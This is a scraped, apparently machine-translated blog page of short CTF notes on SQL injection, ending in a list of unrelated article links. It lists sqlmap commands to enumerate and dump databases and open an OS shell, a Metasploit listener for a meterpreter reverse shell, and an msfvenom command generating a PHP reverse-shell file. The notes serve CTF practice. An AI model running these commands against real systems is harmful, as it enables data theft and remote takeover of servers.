CTF-sql injection notes

Others 2019-09-09 02:40:34 views: null

1. http: // ip: port to open the page to find information

2. web vulnerability scanner owasp-zap

3. Use sqlmap use sql injection vulnerability

  sqlmap -u url -dbs view the database name

  sqlmap -u url -D "database name" -tables view the corresponding data in the database table

  sqlmap -u url -D "database name" -T "table" -columns view the corresponding field

  sqlmap -u url -D "database name" -T "Table Name" -C "column name" -dump field of view corresponding to the value

  You can also try sqlmap -u url -os-shell direct access shell

4. ifconfig

 netstat -pantu view the local port case

 5. Start the listener attack aircraft

  msf > use exploit/multi/handler

    set payload linux/x86/meterpreter/reverse_tcp

    set lhost attack aircraft ip

    set lport 4444

    run

6. Generate rebound shell

  msfvenom -p php / meterpreter / reverse_tcp lhost = Attacker IP lport = 4444 -f raw> /root/Desktop/shell.php

Guess you like

Origin www.cnblogs.com/Crux614/p/11488155.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com